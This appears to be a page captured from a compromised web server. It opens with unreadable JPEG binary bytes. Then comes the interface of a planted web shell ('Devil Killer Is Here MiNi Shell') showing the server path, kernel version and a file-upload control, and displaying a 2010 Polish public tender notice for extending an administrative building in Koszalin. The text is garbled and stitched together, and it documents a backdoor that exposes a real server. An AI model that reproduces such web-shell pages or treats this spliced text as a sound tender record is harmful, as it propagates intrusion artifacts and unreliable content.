JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100621/160219-N-2010.html

<p class="kh_header"><b>Koszalin: ROZBUDOWA I PRZEBUDOWA BUDYNKU ADMINISTRACYJNEGO W KOSZALINIE, UL. RACŁAWICKA 13</b><br>
<b>Numer ogłoszenia: 160219 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koszaliński , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. 094 3428489, faks 094 3462261.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA I PRZEBUDOWA BUDYNKU ADMINISTRACYJNEGO W KOSZALINIE, UL. RACŁAWICKA 13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a) Opis ogólny części rozbudowy - ZADANIE NR 1
Budynek 5-kondygnacyjny całkowicie podpiwniczony, połączony łącznikiem z istniejącym budynkiem Starostwa Powiatowego. Budynek posadowiony bezpośrednio na ławach fundamentowych w systemie monolitycznym. Ściany konstrukcyjne w układzie podłużnym, monolityczne z betonu zbrojonego prętami, zewnętrzne ocieplone warstwą styropianu. Część ścian nadziemia wykończona okładziną ze szkła fasadowego. Stropy zaprojektowano jako monolityczne typu FILIGRAN z prefabrykowana płytą szalunkową. Schody żelbetowe zaprojektowano jako płytowe wylewane na mokro. Do komunikacji między piętrami zaprojektowano windę do przewozu osób niepełnosprawnych. Nad budynkiem zaprojektowano stropodach płaski, niewentylowany, ocieplony wełną mineralną, pokryty papą termozgrzewalną. Obiekt zostanie wyposażony w następujące instalacje: wod-kan, c.o., wentylację mechaniczną i klimatyzację, instalacje elektryczne podstawowe, instalacje komputerowo - telefoniczne, instalacje oddymiania.
Przybliżone dane liczbowe rozbudowywanej części:
-kubatura obiektu: 7947,9 m3,
-powierzchnia użytkowa:1767,9 m2,
-powierzchnia piwnic: 352,9 m2,
-powierzchnia parteru: 355,1 m2,
-powierzchnia I piętra: 342,7 m2,
-powierzchnia II piętra:	361,2 m2,
-powierzchnia III piętra: 349,2 m2,
-powierzchnia IV piętra: 360,0 m2,  
-wysokość budynku: 17,4 m
Opis ogólny uzbrojenia i zagospodarowania terenu
Na działkach o łącznej powierzchni 7.629,20m2 zostaną zrealizowane roboty w zakresie urządzenia terenu: drogi, chodniki, miejsca postojowe, odwodnienie terenu, tereny zielone i elementy małej architektury jak śmietnik, ogrodzenie.
Celem prawidłowego i sprawnego funkcjonowania obiektu, wykonana zostanie kanalizacja deszczowa ze zbiornikiem retencyjnym i pompownia na wody deszczowe. Ścieki sanitarne odprowadzane będą do istniejącej kanalizacji przyobiektowej, zasilanie w wodę z sąsiedniego, istniejącego budynku (sieć miejska). Źródłem zasilania w ciepło rozbudowywanego budynku jest istniejący węzeł cieplny zlokalizowany w przyległym budynku administracyjnym przy ul. Racławickiej 13. Zasilanie do złącza kablowo - pomiarowego zgodnie z warunkami technicznymi przyłączenia wykona Energa - Operator SA Oddział w Koszalinie.
Powierzchnia użytkowa całości:4719,7 m2,
Powierzchnia utwardzonego terenu:	594,5 m2,
Elementy małej architektury: 315,2 m2
b) Opis ogólny projektowanych zmian w budynku istniejącym - ZADANIE NR 2
W istniejącym budynku projektuje się wykonanie dodatkowego stropu w istniejącej sali dwukondygnacyjnej na poziomie piętra wraz z podziałem na pokoje. Ponadto wprowadza się wydzielenie p.pożarowe istniejącej klatki schodowej i montaż klapy oddymiającej. Strop zaprojektowany został jako gęsto żebrowy typu WPS. Ścianki działowe projektuje się w lekkiej konstrukcji z płyt gipsowo-kartonowych.  Zmieniono część ściany zewnętrznej południowej wprowadzając nowy układ otworów okiennych. Zaprojektowano otwory drzwiowe do nowych pomieszczeń na parterze i I piętrze. 
Przybliżone dane liczbowe w części istniejącej:
-powierzchnia parteru - sala, komunikacja:101,4 m2,
-powierzchnia I piętra - sala:	97,0 m2,
-powierzchnia IV piętra - komunikacja:13,5 m2, 
-powierzchnia obudowy pożarowej klatki schodowej: 14,3 m2,
-powierzchnia obudowy klatki schodowej z windą: 20,1 m2,
c)Wykonanie robót budowlano - instalacyjnych, zgodnie z Dokumentacją Projektową (w szczególności projektem budowlanym i projektami wykonawczymi) i Specyfikacjami Technicznymi Wykonania i Odbioru Robót, pozwoleniem na budowę oraz obowiązującymi przepisami prawa, normami, warunkami technicznymi, zasadami wiedzy technicznej i sztuki budowlanej w zakresie:
a)robót architektoniczno - konstrukcyjnych:
-roboty rozbiórkowe i wyburzeniowe,
-roboty związane z rozbudową oraz przebudową istniejącego budynku,
b)robót instalacji wod - kan, c.o., wentylacji i klimatyzacji tj.:
-wewnętrzna instalacja wod-kan,
-wewnętrzna instalacja grzewcza,
-wentylacji i klimatyzacji,
c)robót instalacji elektrycznych:
-roboty rozbiórkowe istniejącej instalacji elektrycznej,
-instalacje elektryczne podstawowe,
-instalacja odgromowa,
-instalacja komputerowo-telefoniczna,
-instalacja oddymiania,
d)robót związanych z uzbrojeniem i zagospodarowaniem terenu:
-odprowadzenia ścieków sanitarnych,
-budowy kanalizacji deszczowej ze zbiornikiem retencyjnym i pompownią,
-ukształtowanie terenu, drogi, chodniki miejsca parkingowe,
-tereny zielone,
-śmietnik,
-ogrodzenie.
Szczegółowy opis przedmiotu zamówienia znajduje się  w  SIWZ  i załącznikach do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>50%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości  50.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany  udokumentować  wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednego zamówienia o wartości nie mniejszej niż  2.500.000,00 PLN brutto obejmującego wybudowanie, rozbudowę lub przebudowę budynku podpiwniczonego, o min. 3 kondygnacjach naziemnych w konstrukcji żelbetowej lub tradycyjnej wraz z instalacjami wewnętrznymi (elektryczna, teletechniczna, wodno-kanalizacyjna, ogrzewcza, wentylacja i klimatyzacja) - Wykonawca musi złożyć wykaz na/wg załącznika nr 8 do SIWZ wraz z wymaganymi załącznikami (dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, składając wykaz osób na/wg zał. nr 7 do SIWZ, że dysponuje osobami do pełnienia funkcji:  
-kierownika budowy - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie bez ograniczeń zgodnie z ustawą z dnia 07.07.1994 roku Prawo budowlane (tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 ze zm.) w specjalności konstrukcyjno-budowlanej bez ograniczeń w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie.  Wskazana osoba do pełnienia funkcji kierownika budowy musi posiadać min. 5 lat doświadczenia w kierowaniu robotami ogólnobudowlanymi;
-kierownika robót instalacyjnych w zakresie instalacji cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą z dnia 07.07.1994 roku Prawo budowlane (tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 ze zm.) do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych lub odpowiadające wymogom Zamawiającego ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji.
-kierownika robót elektrycznych w zakresie instalacji elektrycznych - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą z dnia 07.07.1994 roku Prawo budowlane (tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 ze zm.) do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające wymogom Zamawiającego ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji. 
Wykonawca musi złożyć oświadczenie (na/wg załącznika nr 6 do SIWZ), że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, a w szczególności, że osoba, wskazana do pełnienia funkcji kierownika budowy oraz osoby, wskazane do pełnienia funkcji kierowników robót (instalacyjnych i elektrycznych) posiadają wymagane przez Zamawiającego uprawnienia zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca jest zobowiązany udokumentować posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 500.000,00 PLN, składając dokumenty określone w pkt. X, pdpkt. 1.5 niniejszej SIWZ.
b) Wykonawca jest zobowiązany posiadać opłaconą polisę a w przypadku jej braku inny  dokument potwierdzający, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia min. 1.000.000,00 PLN  
Należna składka ubezpieczeniowa wymagana do dnia składania ofert musi być opłacona zgodnie z harmonogramem przyjętym w polisie (całość lub wymagane przed dniem składania ofert rata/y składki). Jeżeli z treści polisy/dokumentu nie wynika, że polisa została opłacona, do oferty należy dołączyć dokumenty potwierdzające, że na dzień składania ofert polisa była opłacona (np. dowód wpłaty, dowód dokonania przelewu, potwierdzenie towarzystwa ubezpieczeniowego lub inne).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) WYPEŁNIONY  FORMULARZ  OFERTOWY  na/wg  Załącznika  nr 1 do SIWZ;
a) UPROSZCZONE HARMONOGRAMY RZECZOWO-FINANSOWE REALIZACJI INWESTYCJI - odpowiednio na/wg  Załącznika nr 1a do formularza ofertowego (dla zadania nr 1) i na/wg  Załącznika  nr 1b do formularza ofertowego (dla zadania nr 2).
b)   WYKAZ PODWYKONAWCÓW - na/wg  Załącznika  nr 1c do formularza ofertowego;
2) Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do  działania  w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie  inne działania np. podpisanie umowy)  - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych  dokumentów.
W przypadku gdy Wykonawca prowadzi działalność w formie spółki cywilnej, a oferta nie zostanie podpisana przez wszystkich wspólników, należy przedłożyć dodatkowe dokumenty, z których będą wynikały uprawnienia wspólnika(ów) podpisujących ofertę (umowa spółki, pełnomocnictwo lub inne).
3) DOWÓD WNIESIENIA  WADIUM zgodnie z wymaganiami określonymi w rozdziale III, pkt. XIII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:  
a)zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia. Zmiana jest możliwa na osoby spełniające co najmniej wymogi SIWZ, a dla dokonania zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę. Wprowadzenie zmiany bez akceptacji Zamawiającego stanowi podstawę odstąpienia od Umowy przez Zamawiającego z winy Wykonawcy.
b)zmiana podwykonawcy, zakresu lub rodzaju prac powierzonych podwykonawcy lub wartość robót mu powierzonych, spowodowana wyjątkowymi sytuacjami, których nie można było przewidzieć na etapie zawierania umowy przez Wykonawcę z dotychczasowym podwykonawcą. Jeżeli zmianie podlega podwykonawca, na którego zasobach opierał się Wykonawca wykazując spełnienie warunku udziału w przedmiotowym postępowaniu, to Zamawiający będzie żądał, aby nowy podwykonawca wykazał spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca. Dla dokonania zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną zmianę. Wprowadzenie zmiany bez akceptacji Zamawiającego stanowi podstawę odstąpienia od Umowy przez Zamawiającego z winy Wykonawcy.
c)przedłużenie terminu wykonania umowy w następujących przypadkach - jeżeli uniemożliwiają wykonanie przedmiotu umowy w terminie:
-wystąpienia siły wyższej (katastrofy, klęski żywiołowe, niewypały, niewybuchy itp.); 
-wystąpienie nietypowych dla klimatu polskiego warunków atmosferycznych  uniemożliwiających udokumentowaną czasową realizację zadania przez Wykonawcę zgodnie z technologią wykonania, np. gradobicia, trąby powietrzne;
-konieczność wykonania  zamówień dodatkowych, o których mowa w art.67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia podstawowego przedmiotu zamówienia; 
-zaistnienie odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych: kategoria gruntu, kurzawka, skała, niekontrolowane nasypy itp. skutkujące niemożliwością realizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
-zaistnienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie niezinwentaryzowanych podziemnych sieci, urządzeń lub obiektów budowlanych;
-opóźnień w przyłączeniu  obiektu do sieci ogólnomiejskiej przez gestorów mediów, powstałych  z przyczyn nie leżących  po stronie  Wykonawcy;
-konieczność dokonania zmian w dokumentacji projektowej z przyczyn niezależnych od Wykonawcy, a w szczególności w wyniku zmiany przepisów prawa w  trakcie realizacji zamówienia, ujawnienia się w trakcie wykonywania przedmiotu zamówienia wad w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót;
-wystąpienie przerw w wykonywaniu robót z przyczyn niezależnych od Wykonawcy. Stosuje się odpowiednio zasady określone § 18 ust. 6 wzoru umowy.
2.W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pdpkt 1c, termin realizacji przedmiotu umowy może ulec odpowiedniej zmianie, o czas niezbędny do wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Zmiana terminu realizacji przedmiotu umowy wymaga aneksu do umowy, podpisanego przez strony umowy.
